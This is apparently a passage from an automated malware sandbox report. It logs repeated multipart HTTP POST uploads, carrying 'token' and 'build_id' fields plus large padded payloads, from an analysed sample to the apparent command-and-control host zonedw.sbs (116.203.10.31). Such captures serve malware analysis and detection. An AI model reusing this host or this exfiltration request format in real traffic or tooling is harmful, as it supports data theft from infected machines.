                                                                                                                                                                                                                                                2024-12-13 12:55:12 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:55:12 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:55:12 UTC6186OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:55:14 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:55:13 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                72192.168.2.450474116.203.10.31443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:55:13 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----ASRIWTRQIEUAAA1VSRQ1
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: zonedw.sbs
                                                                                                                                                                                                                                                Content-Length: 393697
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-13 12:55:13 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 41 53 52 49 57 54 52 51 49 45 55 41 41 41 31 56 53 52 51 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 37 34 65 33 31 66 31 64 33 66 31 66 33 33 34 33 62 62 66 34 35 63 65 65 62 63 61 39 37 35 36 0d 0a 2d 2d 2d 2d 2d 2d 41 53 52 49 57 54 52 51 49 45 55 41 41 41 31 56 53 52 51 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 41 53 52 49 57 54 52 51 49 45 55 41 41 41 31 56 53 52 51 31 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------ASRIWTRQIEUAAA1VSRQ1Content-Disposition: form-data; name="token"c74e31f1d3f1f3343bbf45ceebca9756------ASRIWTRQIEUAAA1VSRQ1Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------ASRIWTRQIEUAAA1VSRQ1Cont
                                                                                                                                                                                                                                                2024-12-13 12:55:13 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:55:13 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:55:13 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:55:13 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:55:13 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:55:13 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:55:13 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:55:13 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:55:13 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:55:15 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:55:15 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                73192.168.2.450482116.203.10.31443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:55:16 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----5PPP8YCJW4E37Q1NGLXT
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: zonedw.sbs
                                                                                                                                                                                                                                                Content-Length: 131557
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-13 12:55:16 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 35 50 50 50 38 59 43 4a 57 34 45 33 37 51 31 4e 47 4c 58 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 37 34 65 33 31 66 31 64 33 66 31 66 33 33 34 33 62 62 66 34 35 63 65 65 62 63 61 39 37 35 36 0d 0a 2d 2d 2d 2d 2d 2d 35 50 50 50 38 59 43 4a 57 34 45 33 37 51 31 4e 47 4c 58 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 35 50 50 50 38 59 43 4a 57 34 45 33 37 51 31 4e 47 4c 58 54 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------5PPP8YCJW4E37Q1NGLXTContent-Disposition: form-data; name="token"c74e31f1d3f1f3343bbf45ceebca9756------5PPP8YCJW4E37Q1NGLXTContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------5PPP8YCJW4E37Q1NGLXTCont
                                                                                                                                                                                                                                                2024-12-13 12:55:16 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:55:16 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
